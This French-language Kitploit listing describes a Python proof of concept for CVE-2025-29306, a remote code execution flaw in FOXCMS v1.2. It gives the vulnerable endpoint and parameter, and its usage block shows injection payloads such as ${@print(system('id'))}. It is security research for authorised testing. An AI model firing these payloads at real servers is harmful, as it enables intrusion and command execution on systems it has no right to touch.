Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FOXCMS-CVE-2025-29306-POC — Python PoC pour CVE-2025-29306, une injection de paramètre RCE dans FOXCMS v1.2. Injecte du code PHP via le paramètre id sur /images/index.html pour des tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/inok009/foxcms-cve-2025-29306-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubinok009/foxcms-cve-2025-29306-poc

FOXCMS-CVE-2025-29306-POC

Python PoC pour CVE-2025-29306, une injection de paramètre RCE dans FOXCMS v1.2. Injecte du code PHP via le paramètre id sur /images/index.html pour des tests de sécurité autorisés.

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FOXCMS Injection de paramètre RCE – CVE-2025-29306

Ce dépôt contient un PoC basé sur Python pour une vulnérabilité d'exécution de code à distance (RCE) affectant FOXCMS v1.2, un système de gestion de contenu open-source chinois.

Identifiant CVE : CVE-2025-29306
Affecte : FOXCMS v1.2
Type : Injection de paramètre service → Exécution de code


Résumé de la vulnérabilité

FOXCMS souffre d'un mécanisme d'analyse de paramètres non sécurisé dans le paramètre id sur le point de terminaison /images/index.html. Cela permet l'injection de charges utiles à l'aide d'expressions ${@print()}, conduisant à l'exécution de code PHP.


Utilisation du PoC

Prérequis

  • Python 3.x
  • bibliothèque requests
root@kitploit:~
pip install requests # Usage python foxcms_poc.py http://target.com/images/index.html?id= # The script uses payloads like: ${@print(phpinfo())} ${@print(system('id'))}

🔐 Avertissement légal

Ce code est uniquement destiné à des fins éducatives et à des tests de sécurité autorisés. Ne l'utilisez PAS sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.

Auteur Inok009

Télécharger l’outil